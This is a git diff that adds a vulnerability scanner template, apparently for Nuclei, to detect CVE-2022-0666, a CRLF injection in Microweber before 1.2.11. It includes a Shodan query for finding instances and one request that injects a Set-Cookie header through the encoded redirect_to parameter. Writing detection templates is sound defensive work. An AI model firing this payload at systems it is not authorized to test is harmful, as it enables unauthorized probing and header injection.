diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml new file mode 100644 index 0000000000..9c53b2277a --- /dev/null +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-0666 + +info: + name: Microweber < 1.2.11 - CRLF Injection + author: ritikchaddha + severity: high + description: | + CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11. + reference: + - https://github.com/microweber/microweber/commit/f0e338f1b7dc5ec9d99231f4ed3fa6245a5eb128 + - https://huntr.dev/bounties/7215afc7-9133-4749-8e8e-0569317dbd55 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0666 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0666 + cwe-id: CWE-93 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2023,huntr,crlf,microweber + +http: + - method: GET + path: + - "{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;" + + matchers: + - type: regex + part: header + regex: + - "^Set-Cookie: crlfinjection=1;"